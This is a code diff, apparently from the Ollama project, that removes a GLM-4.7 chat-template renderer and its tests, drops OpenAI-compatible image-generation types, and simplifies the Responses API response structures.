-			name: "tools",
-			messages: []api.Message{
-				{Role: "system", Content: "You are a helpful assistant with access to tools."},
-				{Role: "user", Content: "What is the weather like in Tokyo?"},
-			},
-			tools: []api.Tool{
-				{
-					Type: "function",
-					Function: api.ToolFunction{
-						Name:        "get_weather",
-						Description: "Get the current weather in a given location",
-						Parameters: api.ToolFunctionParameters{
-							Type:       "object",
-							Required:   []string{"location"},
-							Properties: propsMap(`{"location": {"type": "string", "description": "The city and state, e.g. San Francisco, CA"}, "unit": {"type": "string", "enum": ["celsius", "fahrenheit"]}}`),
-						},
-					},
-				},
-			},
-			expected: `[gMASK]<sop><|system|>
-# Tools
-
-You may call one or more functions to assist with the user query.
-
-You are provided with function signatures within <tools></tools> XML tags:
-<tools>
-{"type":"function","function":{"name":"get_weather","description":"Get the current weather in a given location","parameters":{"type":"object","required":["location"],"properties":{"location":{"type":"string","description":"The city and state, e.g. San Francisco, CA"},"unit":{"type":"string","description":"","enum":["celsius","fahrenheit"]}}}}}
-</tools>
-
-For each function call, output the function name and arguments within the following XML format:
-<tool_call>{function-name}
-<arg_key>{arg-key-1}</arg_key>
-<arg_value>{arg-value-1}</arg_value>
-<arg_key>{arg-key-2}</arg_key>
-<arg_value>{arg-value-2}</arg_value>
-...
-</tool_call><|system|>
-You are a helpful assistant with access to tools.<|user|>
-What is the weather like in Tokyo?<|assistant|>`,
-		},
-		{
-			skip: "tool call ordering not guaranteed yet",
-			name: "tool calls",
-			messages: []api.Message{
-				{Role: "system", Content: "You are a helpful assistant with access to tools."},
-				{Role: "user", Content: "What is the weather like in Tokyo?"},
-				{
-					Role: "assistant",
-					ToolCalls: []api.ToolCall{
-						{
-							Function: api.ToolCallFunction{
-								Name:      "get_weather",
-								Arguments: args(`{"location": "Tokyo, Japan", "unit": "celsius"}`),
-							},
-						},
-						{
-							Function: api.ToolCallFunction{
-								Name:      "get_weather",
-								Arguments: args(`{"location": "Japan", "unit": "fahrenheit"}`),
-							},
-						},
-					},
-				},
-				{
-					Role:     "tool",
-					Content:  "{\"temperature\": 22, \"weather\": \"partly cloudy\", \"humidity\": 65}",
-					ToolName: "get_weather",
-				},
-				{
-					Role:     "tool",
-					Content:  "{\"temperature\": 68, \"weather\": \"sunny\", \"humidity\": 75}",
-					ToolName: "get_weather",
-				},
-				{
-					Role:    "assistant",
-					Content: "The weather in Tokyo is currently partly cloudy with a temperature of 22°C and 65% humidity. It's a pleasant day with moderate temperatures.",
-				},
-			},
-			tools: []api.Tool{
-				{
-					Type: "function",
-					Function: api.ToolFunction{
-						Name:        "get_weather",
-						Description: "Get the current weather in a given location",
-						Parameters: api.ToolFunctionParameters{
-							Type:       "object",
-							Required:   []string{"location"},
-							Properties: propsMap(`{"location": {"type": "string", "description": "The city and state, e.g. San Francisco, CA"}, "unit": {"type": "string", "enum": ["celsius", "fahrenheit"]}}`),
-						},
-					},
-				},
-			},
-			expected: `[gMASK]<sop><|system|>
-# Tools
-
-You may call one or more functions to assist with the user query.
-
-You are provided with function signatures within <tools></tools> XML tags:
-<tools>
-{"type":"function","function":{"name":"get_weather","description":"Get the current weather in a given location","parameters":{"type":"object","required":["location"],"properties":{"location":{"type":"string","description":"The city and state, e.g. San Francisco, CA"},"unit":{"type":"string","description":"","enum":["celsius","fahrenheit"]}}}}}
-</tools>
-
-For each function call, output the function name and arguments within the following XML format:
-<tool_call>{function-name}
-<arg_key>{arg-key-1}</arg_key>
-<arg_value>{arg-value-1}</arg_value>
-<arg_key>{arg-key-2}</arg_key>
-<arg_value>{arg-value-2}</arg_value>
-...
-</tool_call><|system|>
-You are a helpful assistant with access to tools.<|user|>
-What is the weather like in Tokyo?<|assistant|>
-<think></think>
-<tool_call>get_weather
-<arg_key>location</arg_key>
-<arg_value>Tokyo, Japan</arg_value>
-<arg_key>unit</arg_key>
-<arg_value>celsius</arg_value>
-</tool_call>
-<tool_call>get_weather
-<arg_key>location</arg_key>
-<arg_value>Japan</arg_value>
-<arg_key>unit</arg_key>
-<arg_value>fahrenheit</arg_value>
-</tool_call><|observation|>
-<tool_response>
-{"temperature": 22, "weather": "partly cloudy", "humidity": 65}
-</tool_response>
-<tool_response>
-{"temperature": 68, "weather": "sunny", "humidity": 75}
-</tool_response><|assistant|>
-<think></think>
-The weather in Tokyo is currently partly cloudy with a temperature of 22°C and 65% humidity. It's a pleasant day with moderate temperatures.<|assistant|>`,
-		},
-		{
-			name: "think true",
-			messages: []api.Message{
-				{Role: "user", Content: "Hello, how are you?"},
-			},
-			thinkValue: &api.ThinkValue{Value: true},
-			expected: `[gMASK]<sop><|user|>
-Hello, how are you?<|assistant|>`,
-		},
-		{
-			name: "think false",
-			messages: []api.Message{
-				{Role: "user", Content: "Hello, how are you?"},
-			},
-			thinkValue: &api.ThinkValue{Value: false},
-			expected: `[gMASK]<sop><|user|>
-Hello, how are you?/nothink<|assistant|>
-<think></think>
-`,
-		},
-	}
-	for _, tt := range tests {
-		t.Run(tt.name, func(t *testing.T) {
-			if tt.skip != "" {
-				t.Skip(tt.skip)
-			}
-			renderer := &GLM46Renderer{}
-			rendered, err := renderer.Render(tt.messages, tt.tools, tt.thinkValue)
-			if err != nil {
-				t.Fatal(err)
-			}
-			if diff := cmp.Diff(rendered, tt.expected); diff != "" {
-				t.Errorf("mismatch (-got +want):\n%s", diff)
-				t.Logf("Got:\n%s", rendered)
-				t.Logf("Expected:\n%s", tt.expected)
-			}
-		})
-	}
-}
--- a/model/renderers/glm47.go
+++ b/model/renderers/glm47.go
@@ -1,170 +0,0 @@
-package renderers
-
-import (
-	"encoding/json"
-	"fmt"
-	"strings"
-
-	"github.com/ollama/ollama/api"
-)
-
-// GLM47Renderer renders messages for GLM-4.7 models.
-//
-// GLM-4.7 Thinking Modes (ref: https://docs.z.ai/guides/capabilities/thinking-mode):
-//
-//  1. INTERLEAVED THINKING
-//     The model thinks between tool calls and after receiving tool results.
-//     This enables complex step-by-step reasoning: interpreting each tool output
-//     before deciding what to do next. Thinking blocks are preserved and returned
-//     with tool results to maintain reasoning continuity.
-//
-//  2. PRESERVED THINKING
-//     The model retains reasoning content from previous assistant turns in context.
-//     This preserves reasoning continuity across multi-turn conversations. The
-//     upstream API has a "clear_thinking" parameter to control this:
-//     - clear_thinking=true:  clears reasoning from previous turns (outputs </think>)
-//     - clear_thinking=false: preserves <think>...</think> blocks from previous turns
-//
-//  3. TURN-LEVEL THINKING
-//     Controls whether the model should reason on each turn. The upstream API
-//     uses "enable_thinking" parameter:
-//     - enable_thinking=true:  outputs <think> to start reasoning
-//     - enable_thinking=false: outputs </think> to skip reasoning
-//
-// OLLAMA DEFAULTS:
-//   - Thinking is ENABLED by default (thinkValue=nil or true outputs <think>)
-//   - Thinking is PRESERVED by default (reasoning content from previous turns is always
-//     included in <think>...</think> blocks, equivalent to clear_thinking=false)
-//   - Users can disable thinking per-turn via thinkValue=false
-type GLM47Renderer struct{}
-
-func (r *GLM47Renderer) Render(messages []api.Message, tools []api.Tool, thinkValue *api.ThinkValue) (string, error) {
-	var sb strings.Builder
-
-	sb.WriteString("[gMASK]<sop>")
-
-	if len(tools) > 0 {
-		sb.WriteString("<|system|>\n")
-		sb.WriteString("# Tools\n\n")
-		sb.WriteString("You may call one or more functions to assist with the user query.\n\n")
-		sb.WriteString("You are provided with function signatures within <tools></tools> XML tags:\n")
-		sb.WriteString("<tools>\n")
-		for _, tool := range tools {
-			d, _ := json.Marshal(tool)
-			sb.WriteString(formatGLM47ToolJSON(d))
-			sb.WriteString("\n")
-		}
-		sb.WriteString("</tools>\n\n")
-		sb.WriteString("For each function call, output the function name and arguments within the following XML format:\n")
-		sb.WriteString("<tool_call>{function-name}<arg_key>{arg-key-1}</arg_key><arg_value>{arg-value-1}</arg_value><arg_key>{arg-key-2}</arg_key><arg_value>{arg-value-2}</arg_value>...</tool_call>")
-	}
-
-	think := true
-	if thinkValue != nil && !thinkValue.Bool() {
-		think = false
-	}
-
-	for i, message := range messages {
-		switch message.Role {
-		case "user":
-			sb.WriteString("<|user|>")
-			sb.WriteString(message.Content)
-		case "assistant":
-			sb.WriteString("<|assistant|>")
-			if message.Thinking != "" {
-				sb.WriteString("<think>" + message.Thinking + "</think>")
-			} else {
-				sb.WriteString("</think>")
-			}
-			if message.Content != "" {
-				sb.WriteString(message.Content)
-			}
-			if len(message.ToolCalls) > 0 {
-				for _, toolCall := range message.ToolCalls {
-					sb.WriteString("<tool_call>" + toolCall.Function.Name)
-					sb.WriteString(renderGLM47ToolArguments(toolCall.Function.Arguments))
-					sb.WriteString("</tool_call>")
-				}
-			}
-		case "tool":
-			if i == 0 || messages[i-1].Role != "tool" {
-				sb.WriteString("<|observation|>")
-			}
-			sb.WriteString("<tool_response>")
-			sb.WriteString(message.Content)
-			sb.WriteString("</tool_response>")
-		case "system":
-			sb.WriteString("<|system|>")
-			sb.WriteString(message.Content)
-		}
-	}
-
-	sb.WriteString("<|assistant|>")
-	if think {
-		sb.WriteString("<think>")
-	} else {
-		sb.WriteString("</think>")
-	}
-
-	return sb.String(), nil
-}
-
-func renderGLM47ToolArguments(args api.ToolCallFunctionArguments) string {
-	var sb strings.Builder
-	for key, value := range args.All() {
-		sb.WriteString("<arg_key>" + key + "</arg_key>")
-		var valueStr string
-		if str, ok := value.(string); ok {
-			valueStr = str
-		} else {
-			jsonBytes, err := json.Marshal(value)
-			if err != nil {
-				valueStr = fmt.Sprintf("%v", value)
-			} else {
-				valueStr = string(jsonBytes)
-			}
-		}
-
-		sb.WriteString("<arg_value>" + valueStr + "</arg_value>")
-	}
-
-	return sb.String()
-}
-
-func formatGLM47ToolJSON(raw []byte) string {
-	var sb strings.Builder
-	sb.Grow(len(raw) + len(raw)/10)
-
-	inString := false
-	escaped := false
-	for i := range raw {
-		ch := raw[i]
-		sb.WriteByte(ch)
-
-		if inString {
-			if escaped {
-				escaped = false
-				continue
-			}
-			if ch == '\\' {
-				escaped = true
-				continue
-			}
-			if ch == '"' {
-				inString = false
-			}
-			continue
-		}
-
-		if ch == '"' {
-			inString = true
-			continue
-		}
-
-		if ch == ':' || ch == ',' {
-			sb.WriteByte(' ')
-		}
-	}
-
-	return sb.String()
-}
--- a/model/renderers/glm47_test.go
+++ b/model/renderers/glm47_test.go
@@ -1,191 +0,0 @@
-package renderers
-
-import (
-	"testing"
-
-	"github.com/google/go-cmp/cmp"
-	"github.com/ollama/ollama/api"
-)
-
-func TestGLM47Renderer(t *testing.T) {
-	tests := []struct {
-		name       string
-		messages   []api.Message
-		tools      []api.Tool
-		thinkValue *api.ThinkValue
-		expected   string
-	}{
-		{
-			name: "basic user message",
-			messages: []api.Message{
-				{Role: "user", Content: "Hello"},
-			},
-			expected: "[gMASK]<sop><|user|>Hello<|assistant|><think>",
-		},
-		{
-			name: "thinking disabled",
-			messages: []api.Message{
-				{Role: "user", Content: "Hello"},
-			},
-			thinkValue: &api.ThinkValue{Value: false},
-			expected:   "[gMASK]<sop><|user|>Hello<|assistant|></think>",
-		},
-		{
-			name: "system and user",
-			messages: []api.Message{
-				{Role: "system", Content: "You are helpful."},
-				{Role: "user", Content: "Hello"},
-			},
-			expected: "[gMASK]<sop><|system|>You are helpful.<|user|>Hello<|assistant|><think>",
-		},
-		{
-			name: "multi-turn conversation",
-			messages: []api.Message{
-				{Role: "user", Content: "Hi"},
-				{Role: "assistant", Content: "Hello there"},
-				{Role: "user", Content: "How are you?"},
-			},
-			expected: "[gMASK]<sop><|user|>Hi<|assistant|></think>Hello there<|user|>How are you?<|assistant|><think>",
-		},
-		{
-			name: "assistant with reasoning_content",
-			messages: []api.Message{
-				{Role: "user", Content: "Answer with reasoning."},
-				{Role: "assistant", Thinking: "Plan.", Content: "Done."},
-			},
-			expected: "[gMASK]<sop><|user|>Answer with reasoning.<|assistant|><think>Plan.</think>Done.<|assistant|><think>",
-		},
-		{
-			name: "tool call with empty content",
-			messages: []api.Message{
-				{Role: "user", Content: "Weather?"},
-				{
-					Role: "assistant",
-					ToolCalls: []api.ToolCall{
-						{
-							Function: api.ToolCallFunction{
-								Name:      "get_weather",
-								Arguments: args(`{"location": "Tokyo", "unit": "celsius"}`),
-							},
-						},
-					},
-				},
-				{Role: "tool", Content: `{"temperature":22}`},
-			},
-			tools: []api.Tool{
-				{
-					Type: "function",
-					Function: api.ToolFunction{
-						Name:        "get_weather",
-						Description: "Get weather",
-						Parameters: api.ToolFunctionParameters{
-							Type:       "object",
-							Required:   []string{"location"},
-							Properties: propsMap(`{"location": {"type": "string"}}`),
-						},
-					},
-				},
-			},
-			expected: "[gMASK]<sop><|system|>\n# Tools\n\nYou may call one or more functions to assist with the user query.\n\nYou are provided with function signatures within <tools></tools> XML tags:\n<tools>\n{\"type\": \"function\", \"function\": {\"name\": \"get_weather\", \"description\": \"Get weather\", \"parameters\": {\"type\": \"object\", \"required\": [\"location\"], \"properties\": {\"location\": {\"type\": \"string\"}}}}}\n</tools>\n\nFor each function call, output the function name and arguments within the following XML format:\n<tool_call>{function-name}<arg_key>{arg-key-1}</arg_key><arg_value>{arg-value-1}</arg_value><arg_key>{arg-key-2}</arg_key><arg_value>{arg-value-2}</arg_value>...</tool_call><|user|>Weather?<|assistant|></think><tool_call>get_weather<arg_key>location</arg_key><arg_value>Tokyo</arg_value><arg_key>unit</arg_key><arg_value>celsius</arg_value></tool_call><|observation|><tool_response>{\"temperature\":22}</tool_response><|assistant|><think>",
-		},
-		{
-			name: "tool call with content",
-			messages: []api.Message{
-				{Role: "user", Content: "Weather?"},
-				{
-					Role:    "assistant",
-					Content: "Let me check",
-					ToolCalls: []api.ToolCall{
-						{
-							Function: api.ToolCallFunction{
-								Name:      "get_weather",
-								Arguments: args(`{"location": "Tokyo"}`),
-							},
-						},
-					},
-				},
-				{Role: "tool", Content: `{"temperature":22}`},
-				{Role: "assistant", Content: "It is 22C."},
-			},
-			tools: []api.Tool{
-				{
-					Type: "function",
-					Function: api.ToolFunction{
-						Name:        "get_weather",
-						Description: "Get weather",
-						Parameters: api.ToolFunctionParameters{
-							Type:       "object",
-							Required:   []string{"location"},
-							Properties: propsMap(`{"location": {"type": "string"}}`),
-						},
-					},
-				},
-			},
-			expected: "[gMASK]<sop><|system|>\n# Tools\n\nYou may call one or more functions to assist with the user query.\n\nYou are provided with function signatures within <tools></tools> XML tags:\n<tools>\n{\"type\": \"function\", \"function\": {\"name\": \"get_weather\", \"description\": \"Get weather\", \"parameters\": {\"type\": \"object\", \"required\": [\"location\"], \"properties\": {\"location\": {\"type\": \"string\"}}}}}\n</tools>\n\nFor each function call, output the function name and arguments within the following XML format:\n<tool_call>{function-name}<arg_key>{arg-key-1}</arg_key><arg_value>{arg-value-1}</arg_value><arg_key>{arg-key-2}</arg_key><arg_value>{arg-value-2}</arg_value>...</tool_call><|user|>Weather?<|assistant|></think>Let me check<tool_call>get_weather<arg_key>location</arg_key><arg_value>Tokyo</arg_value></tool_call><|observation|><tool_response>{\"temperature\":22}</tool_response><|assistant|></think>It is 22C.<|assistant|><think>",
-		},
-		{
-			name: "multiple tool calls and responses",
-			messages: []api.Message{
-				{Role: "user", Content: "Compare weather"},
-				{
-					Role: "assistant",
-					ToolCalls: []api.ToolCall{
-						{
-							Function: api.ToolCallFunction{
-								Name:      "get_weather",
-								Arguments: args(`{"location": "Tokyo"}`),
-							},
-						},
-						{
-							Function: api.ToolCallFunction{
-								Name:      "get_weather",
-								Arguments: args(`{"location": "Paris"}`),
-							},
-						},
-					},
-				},
-				{Role: "tool", Content: `{"temperature":22}`},
-				{Role: "tool", Content: `{"temperature":18}`},
-			},
-			tools: []api.Tool{
-				{
-					Type: "function",
-					Function: api.ToolFunction{
-						Name:        "get_weather",
-						Description: "Get weather",
-						Parameters: api.ToolFunctionParameters{
-							Type:       "object",
-							Required:   []string{"location"},
-							Properties: propsMap(`{"location": {"type": "string"}}`),
-						},
-					},
-				},
-			},
-			expected: "[gMASK]<sop><|system|>\n# Tools\n\nYou may call one or more functions to assist with the user query.\n\nYou are provided with function signatures within <tools></tools> XML tags:\n<tools>\n{\"type\": \"function\", \"function\": {\"name\": \"get_weather\", \"description\": \"Get weather\", \"parameters\": {\"type\": \"object\", \"required\": [\"location\"], \"properties\": {\"location\": {\"type\": \"string\"}}}}}\n</tools>\n\nFor each function call, output the function name and arguments within the following XML format:\n<tool_call>{function-name}<arg_key>{arg-key-1}</arg_key><arg_value>{arg-value-1}</arg_value><arg_key>{arg-key-2}</arg_key><arg_value>{arg-value-2}</arg_value>...</tool_call><|user|>Compare weather<|assistant|></think><tool_call>get_weather<arg_key>location</arg_key><arg_value>Tokyo</arg_value></tool_call><tool_call>get_weather<arg_key>location</arg_key><arg_value>Paris</arg_value></tool_call><|observation|><tool_response>{\"temperature\":22}</tool_response><tool_response>{\"temperature\":18}</tool_response><|assistant|><think>",
-		},
-		{
-			name: "preserved thinking in multi-turn",
-			messages: []api.Message{
-				{Role: "user", Content: "Think step by step"},
-				{Role: "assistant", Thinking: "Let me think...", Content: "Here's my answer."},
-				{Role: "user", Content: "Continue"},
-			},
-			expected: "[gMASK]<sop><|user|>Think step by step<|assistant|><think>Let me think...</think>Here's my answer.<|user|>Continue<|assistant|><think>",
-		},
-	}
-
-	for _, tt := range tests {
-		t.Run(tt.name, func(t *testing.T) {
-			renderer := &GLM47Renderer{}
-			rendered, err := renderer.Render(tt.messages, tt.tools, tt.thinkValue)
-			if err != nil {
-				t.Fatal(err)
-			}
-			if diff := cmp.Diff(rendered, tt.expected); diff != "" {
-				t.Errorf("mismatch (-got +want):\n%s", diff)
-				t.Logf("Got:\n%s", rendered)
-				t.Logf("Expected:\n%s", tt.expected)
-			}
-		})
-	}
-}
--- a/model/renderers/renderer.go
+++ b/model/renderers/renderer.go
@@ -80,8 +80,6 @@ func rendererForName(name string) Renderer {
 		return &Nemotron3NanoRenderer{}
 	case "functiongemma":
 		return &FunctionGemmaRenderer{}
-	case "glm-4.7":
-		return &GLM47Renderer{}
 	default:
 		return nil
 	}
--- a/model/renderers/testhelpers_test.go
+++ b/model/renderers/testhelpers_test.go
@@ -1,26 +1,6 @@
 package renderers

-import (
-	"encoding/json"
-
-	"github.com/ollama/ollama/api"
-)
-
-func args(s string) api.ToolCallFunctionArguments {
-	var result api.ToolCallFunctionArguments
-	if err := json.Unmarshal([]byte(s), &result); err != nil {
-		panic("invalid JSON in args(): " + err.Error())
-	}
-	return result
-}
-
-func propsMap(s string) *api.ToolPropertiesMap {
-	var result api.ToolPropertiesMap
-	if err := json.Unmarshal([]byte(s), &result); err != nil {
-		panic("invalid JSON in propsMap(): " + err.Error())
-	}
-	return &result
-}
+import "github.com/ollama/ollama/api"

 // testPropsMap creates a ToolPropertiesMap from a map (convenience function for tests, order not preserved)
 func testPropsMap(m map[string]api.ToolProperty) *api.ToolPropertiesMap {
--- a/openai/openai.go
+++ b/openai/openai.go
@@ -630,10 +630,6 @@ func nameFromToolCallID(messages []Message, toolCallID string) string {

 // decodeImageURL decodes a base64 data URI into raw image bytes.
 func decodeImageURL(url string) (api.ImageData, error) {
-	if strings.HasPrefix(url, "http://") || strings.HasPrefix(url, "https://") {
-		return nil, errors.New("image URLs are not currently supported, please use base64 encoded data instead")
-	}
-
 	types := []string{"jpeg", "jpg", "png", "webp"}

 	// Support blank mime type to match /api/chat's behavior of taking just unadorned base64
@@ -737,60 +733,3 @@ func FromCompleteRequest(r CompletionRequest) (api.GenerateRequest, error) {
 		DebugRenderOnly: r.DebugRenderOnly,
 	}, nil
 }
-
-// ImageGenerationRequest is an OpenAI-compatible image generation request.
-type ImageGenerationRequest struct {
-	Model          string `json:"model"`
-	Prompt         string `json:"prompt"`
-	N              int    `json:"n,omitempty"`
-	Size           string `json:"size,omitempty"`
-	ResponseFormat string `json:"response_format,omitempty"`
-	Seed           *int64 `json:"seed,omitempty"`
-}
-
-// ImageGenerationResponse is an OpenAI-compatible image generation response.
-type ImageGenerationResponse struct {
-	Created int64            `json:"created"`
-	Data    []ImageURLOrData `json:"data"`
-}
-
-// ImageURLOrData contains either a URL or base64-encoded image data.
-type ImageURLOrData struct {
-	URL     string `json:"url,omitempty"`
-	B64JSON string `json:"b64_json,omitempty"`
-}
-
-// FromImageGenerationRequest converts an OpenAI image generation request to an Ollama GenerateRequest.
-func FromImageGenerationRequest(r ImageGenerationRequest) api.GenerateRequest {
-	req := api.GenerateRequest{
-		Model:  r.Model,
-		Prompt: r.Prompt,
-	}
-	// Parse size if provided (e.g., "1024x768")
-	if r.Size != "" {
-		var w, h int32
-		if _, err := fmt.Sscanf(r.Size, "%dx%d", &w, &h); err == nil {
-			req.Width = w
-			req.Height = h
-		}
-	}
-	if r.Seed != nil {
-		if req.Options == nil {
-			req.Options = map[string]any{}
-		}
-		req.Options["seed"] = *r.Seed
-	}
-	return req
-}
-
-// ToImageGenerationResponse converts an Ollama GenerateResponse to an OpenAI ImageGenerationResponse.
-func ToImageGenerationResponse(resp api.GenerateResponse) ImageGenerationResponse {
-	var data []ImageURLOrData
-	if resp.Image != "" {
-		data = []ImageURLOrData{{B64JSON: resp.Image}}
-	}
-	return ImageGenerationResponse{
-		Created: resp.CreatedAt.Unix(),
-		Data:    data,
-	}
-}
--- a/openai/responses.go
+++ b/openai/responses.go
@@ -4,7 +4,6 @@ import (
 	"encoding/json"
 	"fmt"
 	"math/rand"
-	"time"

 	"github.com/ollama/ollama/api"
 )
@@ -266,9 +265,9 @@ type ResponsesText struct {
 type ResponsesTool struct {
 	Type        string         `json:"type"` // "function"
 	Name        string         `json:"name"`
-	Description *string        `json:"description"` // nullable but required
-	Strict      *bool          `json:"strict"`      // nullable but required
-	Parameters  map[string]any `json:"parameters"`  // nullable but required
+	Description string         `json:"description,omitempty"`
+	Strict      bool           `json:"strict,omitempty"`
+	Parameters  map[string]any `json:"parameters,omitempty"`
 }

 type ResponsesRequest struct {
@@ -476,16 +475,11 @@ func convertTool(t ResponsesTool) (api.Tool, error) {
 		}
 	}

-	var description string
-	if t.Description != nil {
-		description = *t.Description
-	}
-
 	return api.Tool{
 		Type: t.Type,
 		Function: api.ToolFunction{
 			Name:        t.Name,
-			Description: description,
+			Description: t.Description,
 			Parameters:  params,
 		},
 	}, nil
@@ -522,60 +516,17 @@ func convertInputMessage(m ResponsesInputMessage) (api.Message, error) {

 // Response types for the Responses API

-// ResponsesTextField represents the text output configuration in the response.
-type ResponsesTextField struct {
-	Format ResponsesTextFormat `json:"format"`
-}
-
-// ResponsesReasoningOutput represents reasoning configuration in the response.
-type ResponsesReasoningOutput struct {
-	Effort  *string `json:"effort,omitempty"`
-	Summary *string `json:"summary,omitempty"`
-}
-
-// ResponsesError represents an error in the response.
-type ResponsesError struct {
-	Code    string `json:"code"`
-	Message string `json:"message"`
-}
-
-// ResponsesIncompleteDetails represents details about why a response was incomplete.
-type ResponsesIncompleteDetails struct {
-	Reason string `json:"reason"`
-}
-
 type ResponsesResponse struct {
-	ID                 string                      `json:"id"`
-	Object             string                      `json:"object"`
-	CreatedAt          int64                       `json:"created_at"`
-	CompletedAt        *int64                      `json:"completed_at"`
-	Status             string                      `json:"status"`
-	IncompleteDetails  *ResponsesIncompleteDetails `json:"incomplete_details"`
-	Model              string                      `json:"model"`
-	PreviousResponseID *string                     `json:"previous_response_id"`
-	Instructions       *string                     `json:"instructions"`
-	Output             []ResponsesOutputItem       `json:"output"`
-	Error              *ResponsesError             `json:"error"`
-	Tools              []ResponsesTool             `json:"tools"`
-	ToolChoice         any                         `json:"tool_choice"`
-	Truncation         string                      `json:"truncation"`
-	ParallelToolCalls  bool                        `json:"parallel_tool_calls"`
-	Text               ResponsesTextField          `json:"text"`
-	TopP               float64                     `json:"top_p"`
-	PresencePenalty    float64                     `json:"presence_penalty"`
-	FrequencyPenalty   float64                     `json:"frequency_penalty"`
-	TopLogprobs        int                         `json:"top_logprobs"`
-	Temperature        float64                     `json:"temperature"`
-	Reasoning          *ResponsesReasoningOutput   `json:"reasoning"`
-	Usage              *ResponsesUsage             `json:"usage"`
-	MaxOutputTokens    *int                        `json:"max_output_tokens"`
-	MaxToolCalls       *int                        `json:"max_tool_calls"`
-	Store              bool                        `json:"store"`
-	Background         bool                        `json:"background"`
-	ServiceTier        string                      `json:"service_tier"`
-	Metadata           map[string]any              `json:"metadata"`
-	SafetyIdentifier   *string                     `json:"safety_identifier"`
-	PromptCacheKey     *string                     `json:"prompt_cache_key"`
+	ID        string                `json:"id"`
+	Object    string                `json:"object"`
+	CreatedAt int64                 `json:"created_at"`
+	Status    string                `json:"status"`
+	Model     string                `json:"model"`
+	Output    []ResponsesOutputItem `json:"output"`
+	Usage     *ResponsesUsage       `json:"usage,omitempty"`
+	// TODO(drifkin): add `temperature` and `top_p` to the response, but this
+	// requires additional plumbing to find the effective values since the
+	// defaults can come from the model or the request
 }

 type ResponsesOutputItem struct {
@@ -599,39 +550,18 @@ type ResponsesReasoningSummary struct {
 }

 type ResponsesOutputContent struct {
-	Type        string `json:"type"` // "output_text"
-	Text        string `json:"text"`
-	Annotations []any  `json:"annotations"`
-	Logprobs    []any  `json:"logprobs"`
-}
-
-type ResponsesInputTokensDetails struct {
-	CachedTokens int `json:"cached_tokens"`
-}
-
-type ResponsesOutputTokensDetails struct {
-	ReasoningTokens int `json:"reasoning_tokens"`
+	Type string `json:"type"` // "output_text"
+	Text string `json:"text"`
 }

 type ResponsesUsage struct {
-	InputTokens         int                          `json:"input_tokens"`
-	OutputTokens        int                          `json:"output_tokens"`
-	TotalTokens         int                          `json:"total_tokens"`
-	InputTokensDetails  ResponsesInputTokensDetails  `json:"input_tokens_details"`
-	OutputTokensDetails ResponsesOutputTokensDetails `json:"output_tokens_details"`
+	InputTokens  int `json:"input_tokens"`
+	OutputTokens int `json:"output_tokens"`
+	TotalTokens  int `json:"total_tokens"`
 }

-// derefFloat64 returns the value of a float64 pointer, or a default if nil.
-func derefFloat64(p *float64, def float64) float64 {
-	if p != nil {
-		return *p
-	}
-	return def
-}
-
-// ToResponse converts an api.ChatResponse to a Responses API response.
-// The request is used to echo back request parameters in the response.
-func ToResponse(model, responseID, itemID string, chatResponse api.ChatResponse, request ResponsesRequest) ResponsesResponse {
+// ToResponse converts an api.ChatResponse to a Responses API response
+func ToResponse(model, responseID, itemID string, chatResponse api.ChatResponse) ResponsesResponse {
 	var output []ResponsesOutputItem

 	// Add reasoning item if thinking is present
@@ -655,7 +585,6 @@ func ToResponse(model, responseID, itemID string, chatResponse api.ChatResponse,
 			output = append(output, ResponsesOutputItem{
 				ID:        fmt.Sprintf("fc_%s_%d", responseID, i),
 				Type:      "function_call",
-				Status:    "completed",
 				CallID:    tc.ID,
 				Name:      tc.Function.Name,
 				Arguments: tc.Function.Arguments,
@@ -669,90 +598,25 @@ func ToResponse(model, responseID, itemID string, chatResponse api.ChatResponse,
 			Role:   "assistant",
 			Content: []ResponsesOutputContent{
 				{
-					Type:        "output_text",
-					Text:        chatResponse.Message.Content,
-					Annotations: []any{},
-					Logprobs:    []any{},
+					Type: "output_text",
+					Text: chatResponse.Message.Content,
 				},
 			},
 		})
 	}

-	var instructions *string
-	if request.Instructions != "" {
-		instructions = &request.Instructions
-	}
-
-	// Build truncation with default
-	truncation := "disabled"
-	if request.Truncation != nil {
-		truncation = *request.Truncation
-	}
-
-	tools := request.Tools
-	if tools == nil {
-		tools = []ResponsesTool{}
-	}
-
-	text := ResponsesTextField{
-		Format: ResponsesTextFormat{Type: "text"},
-	}
-	if request.Text != nil && request.Text.Format != nil {
-		text.Format = *request.Text.Format
-	}
-
-	// Build reasoning output from request
-	var reasoning *ResponsesReasoningOutput
-	if request.Reasoning.Effort != "" || request.Reasoning.Summary != "" {
-		reasoning = &ResponsesReasoningOutput{}
-		if request.Reasoning.Effort != "" {
-			reasoning.Effort = &request.Reasoning.Effort
-		}
-		if request.Reasoning.Summary != "" {
-			reasoning.Summary = &request.Reasoning.Summary
-		}
-	}
-
 	return ResponsesResponse{
-		ID:                 responseID,
-		Object:             "response",
-		CreatedAt:          chatResponse.CreatedAt.Unix(),
-		CompletedAt:        nil, // Set by middleware when writing final response
-		Status:             "completed",
-		IncompleteDetails:  nil, // Only populated if response incomplete
-		Model:              model,
-		PreviousResponseID: nil, // Not supported
-		Instructions:       instructions,
-		Output:             output,
-		Error:              nil, // Only populated on failure
-		Tools:              tools,
-		ToolChoice:         "auto", // Default value
-		Truncation:         truncation,
-		ParallelToolCalls:  true, // Default value
-		Text:               text,
-		TopP:               derefFloat64(request.TopP, 1.0),
-		PresencePenalty:    0, // Default value
-		FrequencyPenalty:   0, // Default value
-		TopLogprobs:        0, // Default value
-		Temperature:        derefFloat64(request.Temperature, 1.0),
-		Reasoning:          reasoning,
+		ID:        responseID,
+		Object:    "response",
+		CreatedAt: chatResponse.CreatedAt.Unix(),
+		Status:    "completed",
+		Model:     model,
+		Output:    output,
 		Usage: &ResponsesUsage{
 			InputTokens:  chatResponse.PromptEvalCount,
 			OutputTokens: chatResponse.EvalCount,
 			TotalTokens:  chatResponse.PromptEvalCount + chatResponse.EvalCount,
-			// TODO(drifkin): wire through the actual values
-			InputTokensDetails: ResponsesInputTokensDetails{CachedTokens: 0},
-			// TODO(drifkin): wire through the actual values
-			OutputTokensDetails: ResponsesOutputTokensDetails{ReasoningTokens: 0},
 		},
-		MaxOutputTokens:  request.MaxOutputTokens,
-		MaxToolCalls:     nil,   // Not supported
-		Store:            false, // We don't store responses
-		Background:       request.Background,
-		ServiceTier:      "default", // Default value
-		Metadata:         map[string]any{},
-		SafetyIdentifier: nil, // Not supported
-		PromptCacheKey:   nil, // Not supported
 	}
 }

@@ -772,7 +636,6 @@ type ResponsesStreamConverter struct {
 	responseID string
 	itemID     string
 	model      string
-	request    ResponsesRequest

 	// State tracking (mutated across Process calls)
